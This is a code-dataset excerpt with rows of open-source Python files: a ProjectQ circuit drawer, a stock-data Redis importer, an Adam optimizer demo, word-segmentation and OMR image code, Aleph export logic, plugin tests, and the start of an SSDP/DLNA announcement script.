repo_name
stringlengths 6
61
| path
stringlengths 4
230
| copies
stringlengths 1
3
| size
stringlengths 4
6
| text
stringlengths 1.01k
850k
| license
stringclasses 15
values | hash
int64 -9,220,477,234,079,998,000
9,219,060,020B
| line_mean
float64 11.6
96.6
| line_max
int64 32
939
| alpha_frac
float64 0.26
0.9
| autogenerated
bool 1
class | ratio
float64 1.62
6.1
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ProjectQ-Framework/ProjectQ | projectq/backends/_circuits/_drawer_matplotlib.py | 1 | 9345 | # -*- coding: utf-8 -*-
# Copyright 2020 ProjectQ-Framework (www.projectq.ch)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Contains a compiler engine which generates matplotlib figures describing the
circuit.
"""
from builtins import input
import re
import itertools
from projectq.cengines import LastEngineException, BasicEngine
from projectq.ops import FlushGate, Measure, Allocate, Deallocate
from projectq.meta import get_control_count
from ._plot import to_draw
# ==============================================================================
def _format_gate_str(cmd):
param_str = ''
gate_name = str(cmd.gate)
if '(' in gate_name:
(gate_name, param_str) = re.search(r'(.+)\((.*)\)', gate_name).groups()
params = re.findall(r'([^,]+)', param_str)
params_str_list = []
for param in params:
try:
params_str_list.append('{0:.2f}'.format(float(param)))
except ValueError:
if len(param) < 8:
params_str_list.append(param)
else:
params_str_list.append(param[:5] + '...')
gate_name += '(' + ','.join(params_str_list) + ')'
return gate_name
# ==============================================================================
class CircuitDrawerMatplotlib(BasicEngine):
"""
CircuitDrawerMatplotlib is a compiler engine which using Matplotlib library
for drawing quantum circuits
"""
def __init__(self, accept_input=False, default_measure=0):
"""
Initialize a circuit drawing engine(mpl)
Args:
accept_input (bool): If accept_input is true, the printer queries
the user to input measurement results if the CircuitDrawerMPL
is the last engine. Otherwise, all measurements yield the
result default_measure (0 or 1).
default_measure (bool): Default value to use as measurement
results if accept_input is False and there is no underlying
backend to register real measurement results.
"""
BasicEngine.__init__(self)
self._accept_input = accept_input
self._default_measure = default_measure
self._map = dict()
self._qubit_lines = {}
def is_available(self, cmd):
"""
Specialized implementation of is_available: Returns True if the
CircuitDrawerMatplotlib is the last engine
(since it can print any command).
Args:
cmd (Command): Command for which to check availability (all
Commands can be printed).
Returns:
availability (bool): True, unless the next engine cannot handle
the Command (if there is a next engine).
"""
try:
# Multi-qubit gates may fail at drawing time if the target qubits
# are not right next to each other on the output graphic.
return BasicEngine.is_available(self, cmd)
except LastEngineException:
return True
def _process(self, cmd): # pylint: disable=too-many-branches
"""
Process the command cmd and stores it in the internal storage
Queries the user for measurement input if a measurement command
arrives if accept_input was set to True. Otherwise, it uses the
default_measure parameter to register the measurement outcome.
Args:
cmd (Command): Command to add to the circuit diagram.
"""
# pylint: disable=R0801
if cmd.gate == Allocate:
qb_id = cmd.qubits[0][0].id
if qb_id not in self._map:
self._map[qb_id] = qb_id
self._qubit_lines[qb_id] = []
return
if cmd.gate == Deallocate:
return
if self.is_last_engine and cmd.gate == Measure:
if get_control_count(cmd) != 0:
raise ValueError('Cannot have control qubits with a measurement gate!')
for qureg in cmd.qubits:
for qubit in qureg:
if self._accept_input:
measurement = None
while measurement not in ('0', '1', 1, 0):
prompt = "Input measurement result (0 or 1) for qubit {}: ".format(qubit)
measurement = input(prompt)
else:
measurement = self._default_measure
self.main_engine.set_measurement_result(qubit, int(measurement))
targets = [qubit.id for qureg in cmd.qubits for qubit in qureg]
controls = [qubit.id for qubit in cmd.control_qubits]
ref_qubit_id = targets[0]
gate_str = _format_gate_str(cmd)
# First find out what is the maximum index that this command might
# have
max_depth = max(len(self._qubit_lines[qubit_id]) for qubit_id in itertools.chain(targets, controls))
# If we have a multi-qubit gate, make sure that all the qubit axes
# have the same depth. We do that by recalculating the maximum index
# over all the known qubit axes.
# This is to avoid the possibility of a multi-qubit gate overlapping
# with some other gates. This could potentially be improved by only
# considering the qubit axes that are between the topmost and
# bottommost qubit axes of the current command.
if len(targets) + len(controls) > 1:
max_depth = max(len(self._qubit_lines[qubit_id]) for qubit_id in self._qubit_lines)
for qb_id in itertools.chain(targets, controls):
depth = len(self._qubit_lines[qb_id])
self._qubit_lines[qb_id] += [None] * (max_depth - depth)
if qb_id == ref_qubit_id:
self._qubit_lines[qb_id].append((gate_str, targets, controls))
else:
self._qubit_lines[qb_id].append(None)
def receive(self, command_list):
"""
Receive a list of commands from the previous engine, print the
commands, and then send them on to the next engine.
Args:
command_list (list<Command>): List of Commands to print (and
potentially send on to the next engine).
"""
for cmd in command_list:
if not isinstance(cmd.gate, FlushGate):
self._process(cmd)
if not self.is_last_engine:
self.send([cmd])
def draw(self, qubit_labels=None, drawing_order=None, **kwargs):
"""
Generates and returns the plot of the quantum circuit stored so far
Args:
qubit_labels (dict): label for each wire in the output figure.
Keys: qubit IDs, Values: string to print out as label for
that particular qubit wire.
drawing_order (dict): position of each qubit in the output
graphic. Keys: qubit IDs, Values: position of qubit on the
qubit line in the graphic.
**kwargs (dict): additional parameters are used to update
the default plot parameters
Returns:
A tuple containing the matplotlib figure and axes objects
Note:
Additional keyword arguments can be passed to this
function in order to further customize the figure output
by matplotlib (default value in parentheses):
- fontsize (14): Font size in pt
- column_spacing (.5): Vertical spacing between two
neighbouring gates (roughly in inches)
- control_radius (.015): Radius of the circle for controls
- labels_margin (1): Margin between labels and begin of
wire (roughly in inches)
- linewidth (1): Width of line
- not_radius (.03): Radius of the circle for X/NOT gates
- gate_offset (.05): Inner margins for gates with a text
representation
- mgate_width (.1): Width of the measurement gate
- swap_delta (.02): Half-size of the SWAP gate
- x_offset (.05): Absolute X-offset for drawing within the axes
- wire_height (1): Vertical spacing between two qubit
wires (roughly in inches)
"""
max_depth = max(len(self._qubit_lines[qubit_id]) for qubit_id in self._qubit_lines)
for qubit_id in self._qubit_lines:
depth = len(self._qubit_lines[qubit_id])
if depth < max_depth:
self._qubit_lines[qubit_id] += [None] * (max_depth - depth)
return to_draw(
self._qubit_lines,
qubit_labels=qubit_labels,
drawing_order=drawing_order,
**kwargs,
)
| apache-2.0 | -8,068,839,753,462,731,000 | 39.454545 | 108 | 0.582343 | false | 4.342472 | false | false | false |
kaija/taiwan_stockloader | import.py | 1 | 1750 | import datetime
import httplib
import urllib
import redis
import json
from datetime import timedelta
#now = datetime.datetime.now();
#today = now.strftime('%Y-%m-%d')
#print today
rdb = redis.Redis('localhost')
def isfloat(value):
try:
float(value)
return True
except ValueError:
return False
def convfloat(value):
try:
return float(value)
except ValueError:
return -1
def convint(value):
try:
return int(value)
except ValueError:
return 0
def save2redis(key, value):
old = rdb.get("TW" + key)
if old is None:
val = []
val.append(value)
rdb.set("TW"+key ,json.dumps(val))
else:
l = json.loads(old)
l.append(value)
rdb.set("TW"+key ,json.dumps(l))
today = datetime.date.today()
one_day = timedelta(days=1);
start_day = datetime.date(2004, 2, 11);
#start_day = datetime.date(2015, 5, 14);
print "Import from " + start_day.strftime("%Y-%m-%d") + " to " + today.strftime("%Y-%m-%d")
dl_date = start_day
stocks = {}
dl_date = start_day
print "Start merge history"
while dl_date < today:
file_name = "data/" + dl_date.strftime("%Y%m%d") + ".csv"
f = open(file_name, 'r')
print "open " + file_name
lines = f.readlines()
for line in lines:
r = line.split('","')
if len(r) == 16:
head = r[0].split("\"")
sid = head[1].strip(" ")
#print head[1] + " " + r[2] + " " + convfloat(r[5])
#print r[2] #volume
#print r[5] #open
obj = {"volume": convint(r[2]), "open": convfloat(r[5]), "high": convfloat(r[6]), "low": convfloat(r[7]), "val": convfloat(r[8]), "date": dl_date.strftime("%Y-%m-%d"), "per": convfloat(r[15]), "buyQuantity": convint(r[12]), "buyPrice": convint(r[11]), "saleQuantity": convint(r[14]), "salePrice": convint(r[13])}
save2redis(sid, obj)
dl_date += one_day
| mit | -800,522,717,132,503,800 | 20.875 | 315 | 0.626286 | false | 2.600297 | false | false | false |
arcman77/banned4hax.github.io | adam_opt_with_simple_func.py | 1 | 3260 | import math as math
import random as random
def get_data(n_points = 300, m = 2, b = 7, variance = 5):
y_train = [(m * x + b + random.uniform(-variance, variance)) for x in range(0, n_points)]
# x = [(m * x + b) for x in range(0, n_points)]
x_train = [x for x in range(0, n_points)]
return [x_train, y_train]
def func(x, theta_vector):
return (theta_vector[0] * x) + theta_vector[1]
# theta_store = [[1, 1]]
m_store = [[0.0, 0.0]]
v_store = [[0.0, 0.0]]
b1 = 0.9
b2 = 0.99
e = math.pow(10, -8)
alpha = 0.001
# using mse as the loss function:
def gradient_of_mse_loss(y, x, t, theta_store):
theta_vector = theta_store[t - 1]
scalar = 2*(y - func(x, theta_vector))
# print('scalar: ', scalar)
return [-x * scalar, -1 * scalar]
def gt(t, data, theta_store):
x_train = data[0]
y_train = data[1]
gradient_loss_sum = [0, 0]
for i in range(1, len(x_train)):
y = y_train[i]
x = x_train[i]
curr_g = gradient_of_mse_loss(y, x, t, theta_store)
gradient_loss_sum[0] += curr_g[0]
gradient_loss_sum[1] += curr_g[1]
return [gradient_loss_sum[0] / len(x_train), gradient_loss_sum[1] / len(x_train)]
def mt(t, data, theta_store):
old_m = m_store[t - 1]
temp1 = [b1 * old_m[0], b1 * old_m[1]]
scale = (1 - b1)
curr_g = gt(t, data, theta_store)
temp2 = [scale * curr_g[0], scale * curr_g[1]]
new_mt = [ temp1[0] + temp2[0], temp1[1] + temp2[1]]
if len(m_store) <= t:
m_store.append(new_mt)
return new_mt
def mtc(t, data, theta_store):
curr_m = mt(t, data, theta_store)
denom = 1 - math.pow(b1, t)
return [curr_m[0] / denom, curr_m[1] / denom]
def vt(t, data, theta_store):
curr_g = gt(t, data, theta_store)
curr_g_sq = [math.pow(curr_g[0], 2), math.pow(curr_g[1], 2)]
temp1 = [b2 * v_store[t - 1][0], b2 * v_store[t - 1][1]]
scale = (1 - b2)
temp2 = [scale * curr_g_sq[0], scale * curr_g_sq[1]]
new_vt = [temp1[0] + temp2[0], temp1[1] + temp2[1]]
if len(v_store) <= t:
v_store.append(new_vt)
return new_vt
def vtc(t, data, theta_store):
curr_vt = vt(t, data, theta_store)
denom = 1 - math.pow(b2, t)
return [curr_vt[0] / denom, curr_vt[1] / denom]
def theta_t(t, data, theta_store):
old_theta = theta_store[t - 1]
m = mtc(t, data, theta_store)
v = vtc(t, data, theta_store)
temp1 = [-alpha * m[0], -alpha * m[1]]
temp2 = [math.pow(v[0], 0.5) + e, math.pow(v[1], 0.5) + e]
temp3 = [temp1[0] / temp2[0], temp1[1] / temp2[1]]
new_theta = [old_theta[0] + temp3[0], old_theta[1] + temp3[1]]
if len(theta_store) <= t:
theta_store.append(new_theta)
return new_theta
def adam():
data = get_data()
theta_store = [[1, 1]]
not_converged = True
old_t = theta_store[0]
t = 1
while not_converged:
theta = theta_t(t, data, theta_store)
diff = math.pow(old_t[0] - theta[0], 2) + math.pow(old_t[1] - theta[1], 2)
old_t = theta
# if diff < 0.0000000000000001:
if diff < e:
not_converged = False
t += 1
print(theta, t)
# print('theta_store: ', theta_store)
# print('m_store: ', m_store)
# print('v_store: ', v_store)
return theta
adam()
| mit | 3,079,845,818,083,412,500 | 30.047619 | 93 | 0.547546 | false | 2.5 | false | false | false |
ExpResults/libweicws | tools/script/ws.py | 2 | 3855 | #!/usr/bin/env python
unknownSample = "$NA$"
#####################################################################
# #
# Sentence class #
# #
#####################################################################
class Sentence:
default_encoding = "utf-8"
def __init__(self, raw, train=False, encoding="utf-8"):
self.raw = raw
self.sentence = "".join(raw.split()).decode(encoding).encode(self.default_encoding)
self.forms = [form.encode(self.default_encoding) for form in self.sentence.decode(encoding)]
self.tags = [unknownSample] * len(self.forms)
self.extra_tags = [unknownSample] * len(self.forms)
self.train = train
if train:
self.goldwords = self.raw.split()
self.goldtags = [unknownSample] * len(self.forms)
i = 0
for word in self.goldwords:
L = len(word.decode(self.default_encoding))
#print word, L
if L == 1:
self.goldtags[i] = "S"
else:
for j in range(L):
if j == 0:
self.goldtags[i + j] = "B"
elif j + 1 == L:
self.goldtags[i + j] = "E"
else:
self.goldtags[i + j] = "M"
i += L
def __str__(self):
L = len(self.forms)
if self.train:
return "\t".join(["%s_%s_%s_%s" % (self.forms[i],
self.goldtags[i],
self.tags[i],
self.extra_tags[i]) for i in range(L)])
else:
return "\t".join(["%s_%s_%s" % (self.forms[i],
self.tags[i],
self.extra_tags[i]) for i in range(L)])
def __len__(self):
return len(self.forms)
#####################################################################
# #
# Basic Segmemntor Class #
# #
# + segment #
# + valid #
# + tag_as_word #
# #
#####################################################################
class Segmentor:
def segment(self, sentence):
# for overwrite
pass
def valid(self, sentence, start, end):
ret = True
for i in range(start, end):
ret = ret and (sentence.tags[i] == unknownSample)
return ret
def tag_as_word(self, sentence, start, end, prefix, style):
if style == 2:
# tags in {"B", "I"} style
for i in range(start, end):
if i == start:
sentence.tags[i] = prefix + "B"
else:
sentence.tags[i] = prefix + "I"
elif style == 4:
# tag in {"B", "M", "E", "S"} style
if start + 1 == end:
sentence.tags[start] = prefix + "S"
else:
for i in range(start, end):
if i == start:
sentence.tags[i] = prefix + "B"
elif i + 1 == end:
sentence.tags[i] = prefix + "E"
else:
sentence.tags[i] = prefix + "M"
elif style == 6:
# tag in {"B0", "B1", "B2", "M", "E", "S"} style
pass
| gpl-3.0 | 4,750,003,086,841,327,000 | 35.714286 | 100 | 0.335668 | false | 4.644578 | false | false | false |
suhelhammoud/omr | src/omr_detection_old.py | 1 | 7009 | import numpy as np
import cv2
from matplotlib import pyplot as plt
class VPoint:
A = 0
B = 1
C = 2
D = 3
ERROR = 10000000
def __init__(self, cx, cy):
self.cx = cx
self.cy = cy
def which(self, x, y):
if x < self.cx:
if y < self.cy:
return VPoint.A
else:
return VPoint.D
else:
if y < self.cy:
return VPoint.B
else:
return VPoint.C
def otsu(img):
# global thresholding
# img = cv2.GaussianBlur(img, (11, 11), 0)
ret1, th1 = cv2.threshold(img, 127, 255, cv2.THRESH_BINARY)
# Otsu's thresholding
ret2, th2 = cv2.threshold(img, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
# Otsu's thresholding after Gaussian filtering
# blur = cv2.GaussianBlur(img, (5, 5), 0)
blur = cv2.medianBlur(img, 5, 0)
ret3, th3 = cv2.threshold(blur, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
# plot all the images and their histograms
images = [img, 0, th1,
img, 0, th2,
blur, 0, th3]
titles = ['Original Noisy Image', 'Histogram', 'Global Thresholding (v=127)',
'Original Noisy Image', 'Histogram', "Otsu's Thresholding",
'Gaussian filtered Image', 'Histogram', "Otsu's Thresholding"]
for i in range(3):
plt.subplot(3, 3, i * 3 + 1), plt.imshow(images[i * 3], 'gray')
plt.title(titles[i * 3]), plt.xticks([]), plt.yticks([])
plt.subplot(3, 3, i * 3 + 2), plt.hist(images[i * 3].ravel(), 256)
plt.title(titles[i * 3 + 1]), plt.xticks([]), plt.yticks([])
plt.subplot(3, 3, i * 3 + 3), plt.imshow(images[i * 3 + 2], 'gray')
plt.title(titles[i * 3 + 2]), plt.xticks([]), plt.yticks([])
plt.show()
def getSides(a):
# inverted = cv2.bitwise_not(a)
height, width = a.shape
xx = np.arange(width)
xy = np.arange(height)
a0 = np.argmax(a, axis=0)
a00 = np.argmax(a[::-1, :], axis=0)
a00 = height - a00
a1 = np.argmax(a, axis=1)
a11 = np.argmax(a[:, ::-1], axis=1)
a11 = width - a11
# a0 = np.nonzero(a0)
# a1 = np.nonzero(a1)
return xx, a0, a00, xy, a1, a11
def law_of_cosines(a, x, b):
xa = a - x
xc = b - x
# calculate angle
cosine_angle = np.dot(xa, xc) / (np.linalg.norm(xa) * np.linalg.norm(xc))
angle = np.arccos(cosine_angle)
return angle
# pAngle = np.degrees(angle)
def border(img):
# global thresholding
# img = cv2.GaussianBlur(img, (11, 11), 0)
# Otsu's thresholding after Median filtering
blur = cv2.medianBlur(img, 17, 0)
ret3, th3 = cv2.threshold(blur, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
print('ret3 ' + str(ret3))
kernel = np.ones((30, 30), np.uint8)
dilate = cv2.dilate(th3, kernel, iterations=1)
dilate = th3
# h = th3.sum(0)
# v = th3.sum(1)
(xx, a0, a00, xy, a1, a11) = getSides(dilate)
# dh = np.diff(dh)
# dv = np.diff(dv)
# xh = np.arange(0, len(h))
# xdh = np.arange(0, len(dh))
plt.subplot(2, 2, 1)
plt.imshow(img, 'gray')
plt.title('original image'), plt.xticks([]), plt.yticks([])
# plt.subplot(3, 2, 2)
# plt.imshow(blur, 'gray')
# plt.title('median blure'), plt.xticks([]), plt.yticks([])
plt.subplot(2, 2, 3)
plt.imshow(th3, 'gray')
plt.title('otsu thresholding'), plt.xticks([]), plt.yticks([])
# plt.subplot(3, 4, 4)
# plt.imshow(a_r, 'gray')
# plt.title('reversed'), plt.xticks([]), plt.yticks([])
# plt.subplot(3,4,5)
# plt.plot(xx, a0,'r', xx, a00, 'g')
# plt.title('a0'), plt.xticks([]), plt.yticks([])
#
# plt.subplot(3,4,6)
# plt.plot(xy, a1, 'r', xy, a11, 'g')
# plt.title('a1'), plt.xticks([]), plt.yticks([])
plt.subplot(2, 2, 2)
nz0 = np.nonzero(a0)[0]
plt.plot(xx[nz0], a0[nz0], 'r', xx[nz0], a00[nz0], 'g')
plt.title('nz scan_x'), plt.xticks([]), plt.yticks([])
plt.subplot(2, 2, 4)
nz1 = np.nonzero(a1)[0]
plt.plot(a1[nz1], xy[nz1], 'r', a11[nz1], xy[nz1], 'g')
plt.title('nz scan_y'), plt.xticks([]), plt.yticks([])
plt.show()
def findCorners(img):
height, width = img.shape
cx = width / 2
cy = height / 2
vertex = VPoint(cx, cy)
print("cx = {cx}, cy = {cy}".format(**locals()))
xx = np.arange(width)
xy = np.arange(height)
scan_x = np.argmax(img, axis=0) # indexes of first white pixel
scan_xr = height - np.argmax(img[::-1, :], axis=0)
x_nz = np.nonzero(scan_x)[0]
scan_x_nz = scan_x[x_nz]
scan_xr_nz = scan_xr[x_nz]
np.save('../data/pickles/a', scan_x_nz)
# print(x_nz)
# print(scan_x_nz)
# print(scan_xr_nz)
# start finding vertexes
# lower line
x_left = x_nz[0]
y_left = scan_x_nz[0]
if y_left > cy:
y_left = scan_xr_nz[0]
x_right = x_nz[-1]
y_right = scan_x_nz[-1]
if y_right > cy:
y_right = scan_xr_nz[-1]
print(vertex.which(x_left, y_left))
print('x_left {x_left}, y_left {y_left}'.format(**locals()))
print(vertex.which(x_right, y_right))
print('x_right {x_right}, y_right {y_right}'.format(**locals()))
# min values for the lower line
ymin_index = np.argmin(scan_x_nz)
xmin = x_nz[ymin_index]
ymin = scan_x_nz[ymin_index]
print(vertex.which(xmin, ymin))
print("xmin = {xmin}, ymin = {ymin}".format(**locals()))
# max values for the upper line
ymax_index = np.argmax(scan_xr_nz)
xmax = x_nz[ymax_index]
ymax = scan_xr_nz[ymax_index]
print(vertex.which(xmax, ymax))
print("xmax = {xmax}, ymax = {ymax}".format(**locals()))
print('----------------')
scan_y = np.argmax(img, axis=1)
scan_yr = width - np.argmax(img[:, ::-1], axis=1)
y_nz = np.nonzero(scan_y)[0]
scan_y_nz = np.nonzero(scan_y)
scan_y_nz = scan_y[y_nz]
scan_yr_nz = scan_yr[y_nz]
yy_left = y_nz[0]
xx_left = scan_y_nz[0]
if xx_left > cx:
xx_left = scan_yr_nz[0]
yy_right = y_nz[-1]
xx_right = scan_y_nz[-1]
if xx_right > cx:
xx_right = scan_yr_nz[-1]
print(vertex.which(xx_left, yy_left))
print('xx_left {xx_left}, yy_left {yy_left}'.format(**locals()))
print(vertex.which(xx_right, yy_right))
print('xx_right {xx_right}, yy_right {yy_right}'.format(**locals()))
# min values for the lower line
xmin_index = np.argmin(scan_x_nz)
xmin = x_nz[ymin_index]
ymin = scan_x_nz[ymin_index]
print(vertex.which(xmin, ymin))
print("xmin = {xmin}, ymin = {ymin}".format(**locals()))
# max values for the upper line
ymax_index = np.argmax(scan_xr_nz)
xmax = x_nz[ymax_index]
ymax = scan_xr_nz[ymax_index]
print(vertex.which(xmax, ymax))
print("xmax = {xmax}, ymax = {ymax}".format(**locals()))
return (xx, scan_x, scan_xr, xy, scan_y, scan_yr)
if __name__ == '__main__':
file_path = '../data/colored/4.jpg'
img = cv2.imread(file_path, 0)
border(img) | apache-2.0 | -139,270,765,766,005,220 | 25.755725 | 81 | 0.550292 | false | 2.783558 | false | false | false |
alephdata/aleph | aleph/logic/export.py | 1 | 6716 | import os
import shutil
import logging
from pprint import pformat # noqa
from zipfile import ZipFile
from tempfile import mkdtemp
from flask import render_template
from normality import safe_filename
from followthemoney.helpers import entity_filename
from followthemoney.export.excel import ExcelExporter
from servicelayer.archive.util import checksum, ensure_path
from aleph.core import archive, db, settings
from aleph.queues import queue_task
from aleph.model import Export, Events, Role, Status, Entity
from aleph.index.entities import iter_proxies, checksums_count
from aleph.index.collections import get_collection
from aleph.logic.util import entity_url, ui_url, archive_url
from aleph.logic.notifications import publish
from aleph.logic.mail import email_role
log = logging.getLogger(__name__)
EXTRA_HEADERS = ["url", "collection"]
WARNING = """
This data export was aborted before it was complete, because the %s
exported entities exceeds the limits set by the system operators.
Contact the operator to discuss bulk exports.
"""
def get_export(export_id):
if export_id is None:
return
export = Export.by_id(export_id, deleted=True)
if export is not None:
return export.to_dict()
def write_document(export_dir, zf, collection, entity):
content_hash = entity.first("contentHash", quiet=True)
if content_hash is None:
return
file_name = entity_filename(entity)
arcname = "{0}-{1}".format(entity.id, file_name)
arcname = os.path.join(collection.get("label"), arcname)
log.info("Export file: %s", arcname)
try:
local_path = archive.load_file(content_hash, temp_path=export_dir)
if local_path is not None and os.path.exists(local_path):
zf.write(local_path, arcname=arcname)
finally:
archive.cleanup_file(content_hash, temp_path=export_dir)
def export_entities(export_id):
export = Export.by_id(export_id)
log.info("Export entities [%r]...", export)
export_dir = ensure_path(mkdtemp(prefix="aleph.export."))
collections = {}
try:
filters = [export.meta.get("query", {"match_none": {}})]
file_path = export_dir.joinpath("export.zip")
with ZipFile(file_path, mode="w") as zf:
excel_name = safe_filename(export.label, extension="xlsx")
excel_path = export_dir.joinpath(excel_name)
exporter = ExcelExporter(excel_path, extra=EXTRA_HEADERS)
proxies = iter_proxies(schemata=Entity.THING, filters=filters)
for idx, entity in enumerate(proxies):
collection_id = entity.context.get("collection_id")
if collection_id not in collections:
collections[collection_id] = get_collection(collection_id)
collection = collections[collection_id]
if collection is None:
continue
extra = [entity_url(entity.id), collection.get("label")]
exporter.write(entity, extra=extra)
write_document(export_dir, zf, collection, entity)
if file_path.stat().st_size >= settings.EXPORT_MAX_SIZE:
concern = "total size of the"
zf.writestr("EXPORT_TOO_LARGE.txt", WARNING % concern)
break
if idx >= settings.EXPORT_MAX_RESULTS:
concern = "number of"
zf.writestr("EXPORT_TOO_LARGE.txt", WARNING % concern)
break
exporter.finalize()
zf.write(excel_path, arcname=excel_name)
file_name = "Export: %s" % export.label
file_name = safe_filename(file_name, extension="zip")
complete_export(export_id, file_path, file_name)
except Exception:
log.exception("Failed to process export [%s]", export_id)
export = Export.by_id(export_id)
export.set_status(status=Status.FAILED)
db.session.commit()
finally:
shutil.rmtree(export_dir)
def create_export(
operation,
role_id,
label,
collection=None,
mime_type=None,
meta=None,
):
export = Export.create(
operation,
role_id,
label,
collection=collection,
mime_type=mime_type,
meta=meta,
)
db.session.commit()
return export
def complete_export(export_id, file_path, file_name):
export = Export.by_id(export_id)
file_path = ensure_path(file_path)
export.file_name = file_name
export.file_size = file_path.stat().st_size
export.content_hash = checksum(file_path)
try:
archive.archive_file(
file_path, content_hash=export.content_hash, mime_type=export.mime_type
)
export.set_status(status=Status.SUCCESS)
except Exception:
log.exception("Failed to upload export: %s", export)
export.set_status(status=Status.FAILED)
db.session.commit()
params = {"export": export}
role = Role.by_id(export.creator_id)
log.info("Export [%r] complete: %s", export, export.status)
publish(
Events.COMPLETE_EXPORT,
params=params,
channels=[role],
)
send_export_notification(export)
def delete_expired_exports():
"""Delete export files from the archive after their time
limit has expired."""
expired_exports = Export.get_expired(deleted=False)
for export in expired_exports:
log.info("Deleting expired export: %r", export)
if export.should_delete_publication():
if export.content_hash is not None:
counts = list(checksums_count([export.content_hash]))
if counts[0][1] == 0:
archive.delete_file(export.content_hash)
export.deleted = True
db.session.add(export)
db.session.commit()
def retry_exports():
for export in Export.get_pending():
queue_task(None, export.operation, export_id=export.id)
def send_export_notification(export):
download_url = archive_url(
export.content_hash,
file_name=export.file_name,
mime_type=export.mime_type,
expire=export.expires_at,
)
params = dict(
role=export.creator,
export_label=export.label,
download_url=download_url,
expiration_date=export.expires_at.strftime("%Y-%m-%d"),
exports_url=ui_url("exports"),
ui_url=settings.APP_UI_URL,
app_title=settings.APP_TITLE,
)
plain = render_template("email/export.txt", **params)
html = render_template("email/export.html", **params)
log.info("Notification: %s", plain)
subject = "Export ready for download"
email_role(export.creator, subject, html=html, plain=plain)
| mit | 2,863,509,297,279,035,000 | 34.162304 | 83 | 0.640411 | false | 3.848711 | false | false | false |
igorsobreira/eizzek | tests/unit/test_decorators.py | 1 | 1275 | from unittest import TestCase
import re
from eizzek.lib.decorators import plugin, session_plugin
from eizzek.lib.registry import registry, session_registry
class PluginTest(TestCase):
def setUp(self):
registry.clear()
def test_plugin(self):
assert len(registry.plugins) == 0
@plugin(r'^ping (.+)$')
def ping(**kwargs):
return ''
assert len(registry.plugins) == 1
assert registry.plugins.has_key('ping')
def test_named_plugin(self):
assert len(registry.plugins) == 0
@plugin(r'^ping (.+)$', name='ping_plugin')
def ping(**kwargs):
return ''
assert len(registry.plugins) == 1
assert registry.plugins.has_key('ping_plugin')
class SessionPluginTest(TestCase):
def setUp(self):
session_registry.clear()
def test_create_session_plugin(self):
assert 0 == len(session_registry.plugins)
@session_plugin
class Translate(object):
name = 'translate'
regex = r'^translate (?P<something>\w+)$'
assert 1 == len(session_registry.plugins)
assert session_registry.plugins.has_key('translate')
| mit | -6,015,821,218,647,185,000 | 23.519231 | 60 | 0.574118 | false | 4.366438 | true | false | false |
GrahamCobb/ssdp-fake | ssdp-fake.py | 1 | 11216 | #!/usr/bin/python
# Copyright (C) 2014 Graham R. Cobb
# Released under GPL V2 -- see LICENSE
# Python multicast code taken from Stack Overflow (https://stackoverflow.com/questions/603852/multicast-in-python/1794373#1794373) by tolomea (https://stackoverflow.com/users/10471/tolomea) under CC BY-SA 3.0
# Other example code taken from Stack Overflow by Toddeman (under CC BY-SA 3.0), however it does not seem to be available any longer
import socket
import struct
import time
import select
import re
from optparse import OptionParser
VERSION='0.3'
DLNA_GRP = '239.255.255.250'
DLNA_PORT = 1900
MCAST_IF = '127.0.0.1'
CRLF = "\015\012"
#SERVER='192.168.0.238'
SERVER=''
UUID=''
URL=''
INTERVAL = 180
parser = OptionParser(usage="usage: %prog [options] server\n %prog --listen-only",
epilog="Server can be specified as hostname or IP address and should be omitted if --listen-only is used",
version="%prog "+VERSION)
parser.add_option("-a", "--all",
action="store_true", dest="allif", default=False,
help="send announcements to all interfaces, not just the loopback interface")
parser.add_option("-i", "--interval", type="int", dest="interval", default=INTERVAL,
help="seconds between notification updates (default %default)")
parser.add_option("-l", "--listen-only",
action="store_true", dest="listen", default=False,
help="just listen and display messages seen, do not contact a server or send announcements")
(options, args) = parser.parse_args()
LISTEN=options.listen
if len(args) == 0 and not LISTEN:
parser.error("server must be specified (hostname or IP address)")
if len(args) > 1:
parser.error("incorrect number of arguments")
if not LISTEN:
SERVER=args[0]
INTERVAL=options.interval
osock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
osock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
osock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 4)
osock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_LOOP, 1)
if not options.allif:
mreq = struct.pack("4sl", socket.inet_aton(MCAST_IF), socket.INADDR_ANY)
osock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_IF, mreq)
imsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
imsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
imsock.bind(('', DLNA_PORT))
mreq = struct.pack("4sl", socket.inet_aton(DLNA_GRP), socket.INADDR_ANY)
imsock.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
def notify(addr, port):
if (URL != '' and UUID != '' and not LISTEN):
# Note: responses should have ST:, notifies should have NT:
# We include both
msg = 'NOTIFY * HTTP/1.1' + CRLF \
+ 'NT: urn:schemas-upnp-org:device:MediaServer:1' + CRLF \
+ 'USN: uuid:' + UUID + '::urn:schemas-upnp-org:device:MediaServer:1' + CRLF \
+ 'NTS: ssdp:alive' + CRLF \
+ 'LOCATION: ' + URL + CRLF \
+ 'HOST: 239.255.255.250:1900' + CRLF \
+ 'SERVER: ssdp-fake/0 DLNADOC/1.50 UPnP/1.0 ssdp-fake/0' + CRLF \
+ 'CACHE-CONTROL: max-age=' + str(INTERVAL * 10) + CRLF \
+ CRLF
print "Sending ("+addr+":"+str(port)+"): \n" + msg
osock.sendto(msg, (addr, port))
msg = 'NOTIFY * HTTP/1.1' + CRLF \
+ 'NT: upnp:rootdevice' + CRLF \
